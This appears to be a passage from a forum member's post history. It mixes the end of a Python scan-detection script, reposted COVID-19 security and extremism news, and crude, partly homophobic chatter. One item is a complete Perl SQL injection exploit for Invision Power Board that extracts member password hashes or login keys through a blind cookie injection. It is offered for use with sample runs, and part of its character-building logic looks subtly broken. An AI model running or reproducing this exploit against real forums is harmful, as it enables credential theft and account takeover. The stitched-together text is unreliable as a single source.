Nmap scans start with ARP anyway.")) if args.filter_dst_port: dst_port_whitelist=args.filter_dst_port.upper().split(",") if OS=="win32" and args.scan_type: scan_detect_lst=args.scan_type.upper().split(",") elif OS != "win32" and args.scan_type: print(colored.cyan("[!] Ignoring -s flag, Non Windows OS.")) if OS=="win32" and len(scan_detect_lst)==0: print(colored.cyan("[!] FIN,NULL,XMAS,MAIMON scans are ignored on Windows")) print(colored.cyan("[!] Still wish to detect them? use -s flag, see -h.")) if args.whitelist and not args.block_mode: print(colored.cyan("[!] 
-w has no block mode (-b).")) exit() if args.block_mode and args.whitelist: whitelist() if args.no_report: no_report_scan_list=args.no_report.split(",") if args.log_probe: if os.path.exists(recon_log): if round(os.path.getsize(recon_log)/float(1<<10)) >= max_log_sz: print(colored.cyan("[!] Log file size of "+str(max_log_sz)+" limit reached, delete log file to continue logging.")) exit() if args.archive: if os.path.exists(pcap_file): if round(os.path.getsize(pcap_file)/float(1<<10)) >= max_log_sz: print(colored.cyan("[!] PCAP file size of "+str(max_log_sz)+" limit reached, delete pcap to continue saving.")) exit() if args.delete_fw: rem_firewall_rule(args.delete_fw.split(",")) #Listen for recon attempts. recon_init(args.udp, args.ping_sweep) if __name__=="__main__": isAdmin() try: if haslib("scapy"): from scapy.all import * scapy_ver() except Exception as e: if str(e) == "cannot import name NPCAP_PATH": scapy_ver() try: if haslib("clint"): from clint.textui import colored except Exception as e: print(str(e)) try: print(colored.red(BANNER)) time.sleep(0.2) sys.stdout.flush() except Exception as e: print(str(e)) parser = argparse.ArgumentParser() if len(sys.argv)==1: parser.print_help(sys.stderr) exit() main(parse_args()) Source
  11. Kev

    COVID-19

    Hackers, have you ever considered that it could be another species invading us, the way we invaded the dinosaurs?
  12. Apply pressure to any system – and its weaknesses become apparent. COVID-19 has exerted the necessary pressure to test cybersecurity postures, exposing gaps – some of them yawning, some more subtle – as entire workforces have been ordered to work from home.

As the novel coronavirus escaped the confines of China earlier this year and it became increasingly clear large numbers of workers would have to hunker down at home, all eyes turned to an obvious potential weak spot – VPNs, which would surely sputter under the stress. But as the virus spread it has exposed additional security problems, ranging from the inability to do forensic tests and general upkeep on systems to granting higher-level user privileges to staff to access systems remotely.

Organizations which previously did not have a distributed workforce quickly learned their tools on hand were not designed or intended to work safely offsite, via a VPN or over the internet, said Lisa Davies, head of corporate security at Redox, preventing security and IT teams from conducting even routine, but important, tasks.

“Since many of the security controls and tools used by non-distributed companies depend on being on the local network, they cannot do [many] things remotely,” Davies said. “These companies have found it more difficult to update, monitor logs etc unless the device is on the local network, so when employees take them home, they are in the dark.”

Company equipment left behind as workers fled has languished unmonitored, its vulnerability magnified as employees, outside the sight lines of security teams, connect their own, unsecured devices to company assets. Organizations must “monitor inactive company devices, as possible indicators a device has an issue, or a remote worker may be tempted to use personal technology,” said Davies. “This goes hand-in-hand with technical controls preventing non-company devices from accessing sensitive information.”

The new working order has cast a harsh light on the limitations and safeguards of connectivity, required for business to function. Existing protocols simply are not sufficient, said Luke Willadsen, security consultant, cybersecurity services and solutions firm EmberSec. It appears support for multifactor authentication has been a lot of talk and not quite as much action. Many companies apparently haven’t required it to connect to the network, then disable the work computer’s ability to take a screenshot of the window containing the remote/virtual desktop on the host computer, Willadsen said. That needs to change quickly.

“Don’t let any data pass between the machine originating the connection and the remote/virtual desktop,” Willadsen said. Security teams can bridge this gap by disabling “the clipboard and shared drive access between the origination host and the virtual/remote system,” he said, noting “we don’t want a single byte of information to be exchanged between the two hosts (aside from the network connection that facilitates the session).” That will prevent “the introduction of malware into your network and it prevents employees from exfiltrating confidential or proprietary files,” he said.

Pre-coronavirus, supervisors didn’t have to concern themselves with employee distractions – children running around, barking dogs, fears of a deadly virus’s spread or many other things occurring in a normal household. But now, employee focus is paramount. Workers should be reminded to stay focused and that security policies put in place to protect corporate information are still in place, especially in a world filled with phishing emails designed to prey on those now operating in a busy and confusing world.

“They should also build mechanisms to reinforce such policies in the moment they most need to be followed – for example within the context of an email asking for financial action or confidential information – so that users can make informed decisions before interacting with suspicious emails,” said Matt Petrosky, vice president of customer experience, GreatHorn. “By providing employees with reminders about policies when it matters, companies can significantly reduce risk for their remote workforce.” Via
  13. The bulletin notes there is "no information" yet on specific plots.

A Department of Homeland Security memo sent to law enforcement officials around the country warns that violent extremists could seek to take advantage of the COVID-19 pandemic by carrying out attacks against the U.S., according to the intelligence bulletin, compiled by the agency's Counterterrorism Mission Center and Countering Weapons of Mass Destruction Office.

At this time, DHS said it has but that it has observed certain extremist groups, both foreign and domestic, looking to spread misinformation about the coronavirus.

The memo, which was circulated on Monday, comes after assurances from FBI Director Chris Wray in a video message that agents would be even more vigilant in monitoring threats to the U.S. as the virus spreads. Wray said. "Because our criminal and national security adversaries sure aren't going to take a day off -- whether that's for the coronavirus or, for that matter, anything else."

Among the activities by extremist organizations cited in the DHS bulletin is a clipping from a weekly ISIS newsletter, which called for supporters to carry out attacks against overburdened health care systems in various Western countries.

Another portion of the bulletin singles out activity by white supremacists online who the DHS says have ABC News reported on Monday on an alert from the FBI's New York field office that showed intelligence gathered on racist extremist groups, including neo-Nazis, that were encouraging followers who contract COVID-19 to spread the disease to Jewish people and police officers. Via
  14. Kev

    COVID-19

    Well, how do I know I'm not throwing $6,499 + $30k+ out the window?
  15. Kev

    COVID-19

    If Tefal puts frying pans on sale tomorrow, everyone forgets about the virus of a lifetime.
  16. Kev

    COVID-19

    And I like how you're going to starve, since I've got a few bakeries closed.
  17. Kev

    COVID-19

    Watch it, you're insulting me, you don't even know who you're talking to.
  18. Some map-based applications that trace the path of the virus across the globe could end up infecting a user’s phone with a virus, the digital kind that is. Spam documents that offer information about the virus through emails and message attachments are also increasing,  cyber security firms said.

Mumbai | Pune: Web and mobile applications that track the spread of the Covid-19 virus outbreak are also loading ransomware trojans and trackers to snoop on users, according to cyber security firms.

For instance, some map-based applications that trace the path of the virus across the globe could end up infecting a user’s phone with a virus, the digital kind that is. Spam documents that offer information about the virus through emails and message attachments are also increasing, the firms said.

Information security provider ZScaler said that hackers were now floating applications on the internet that claim to notify a user as soon as anyone infected with the virus is nearby. What such apps do instead is lock out the user and ask for ransoms to unlock their device.

IT security company Lookout also found a ‘Corona live 1.1’ Android application which is a Trojanised version of the legitimate “corona live” app that allows users to get updated with data found on Johns Hopkins University’s coronavirus tracker. Via
  19. Kev

    COVID-19

    Man, I've been a smoker for about 15 years, I cough so much people look at me like I've got measles, I grab a tissue, no big deal, I have civic sense. In my opinion, and regarding the thread title, what's being spread around seems absurd to me / I have about 500k on Instagram, nobody's discussing it // Facebook the same, it's full of the corona of a lifetime
  20. Kev

    COVID-19

    No, that was exactly the point: "if the president is a queer, do you take it up the ass too?" Let them die, they die of stupidity anyway, panic, etc.. and TV
  21. Kev

    COVID-19

    Bullshit, if you'd kept quiet you'd have passed for a philosopher; you're the ones promoting it the most / I know a few hundred cases of deaths from legal highs and nobody ever complained // millions of people die every day /// Becali supposedly "donated" 30 thousand to a textile factory to make masks, when in fact he bought it, because he's not stupid enough to take a loss, but you don't see that on TV
  22. Kev

    COVID-19

    That's not it, man, it's just a test, as Andrei said on Facebook too; I don't remember and I'm not opening the phone, corona of death version 2 has appeared
  23. Kev

    COVID-19

    Sorry for the double post. Watch your pockets, they're ready to fleece you: gloves, masks, glasses with black lenses, no witnesses, be careful.
  24. SQL Injection Exploit

#!/usr/bin/perl
## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)
## tested on version 1 Final and version 3.1.4
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];
$pass      = ($target) ? ('member_login_key') : ('password');

$server =~ s!(http:\/\/)!!;
$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
# target 2 = IPB 3.*, 1 = IPB 2.*, 0 = IPB 1.*
print (($target == 2) ? (' - IPB 3.*') : ($target) ? (' - IPB 2.*') : (' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

# percent-encode every character of the member id for the cookie
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
  # digits first (ASCII 47-58), then lowercase letters (96-122)
  if (&found(47,58) == 0) { &found(96,122); }
  $char = $i;
  if ($char == "0")
  {
    if (length($allchar) > 0)
    {
      print qq{\b\b DONE ]\r\n\r\nMEMBER ID : $member_id\r\n};
      print (($target) ? ('MEMBER_LOGIN_KEY : ') : ('PASSWORD : '));
      print $allchar."\r\n";
    }
    else
    {
      print "\b\b FAILED ]";
    }
    exit();
  }
  else
  {
    $allchar .= chr(42);
  }
  $s_num++;
}

# binary search over the character range using check() as the oracle
sub found($$)
{
  my $fmin = $_[0];
  my $fmax = $_[1];
  if (($fmax - $fmin) < 5) { $i = crack($fmin,$fmax); return $i; }
  $r = int($fmax - ($fmax - $fmin) / 2);
  $check = " BETWEEN $r AND $fmax";
  if (&check($check)) { &found($r,$fmax); } else { &found($fmin,$r); }
}

# linear scan once the range is narrow
sub crack($$)
{
  my $cmin = $_[0];
  my $cmax = $_[1];
  $i = $cmin;
  while ($i < $cmax)
  {
    $crcheck = "=$i";
    if (&check($crcheck)) { return $i; }
    $i++;
  }
  $i = 0;
  return $i;
}

sub check($)
{
  $n++;
  status();
  $ccheck = $_[0];
  $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
  $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
  $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
  $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
  $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
  $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
  printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
    $path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, $pass_hash3, $nmalykh);
  while (<$socket>)
  {
    if (/Set-Cookie: session_id=0;/) { return 1; }
  }
  return 0;
}

sub status()
{
  $status = $n % 5;
  if ($status == 0) { print "\b\b/]"; }
  if ($status == 1) { print "\b\b-]"; }
  if ($status == 2) { print "\b\b\\]"; }
  if ($status == 3) { print "\b\b|]"; }
}

sub usage()
{
  print q(
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3.pl [server] [/folder/] [member_id] [target]
[server]    - host where IPB installed
[/folder/]  - folder where IPB installed
[member_id] - user id for brute
targets :
0 - IPB 1.*
1 - IPB 2.*
2 - IPB 3.* (Prior To 3.1.4)
e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC, http://rst.void.ru, http://ghc.ru
);
  exit();
}

For convenience, change line 72 to print $target (' - IPB 3.*'); Source
  25. Kev

    COVID-19

    I'm indifferent, I don't give a damn, I live in the countryside, organic milk, organic potatoes, organic tomatoes, boiled țuică. Fuck their flu.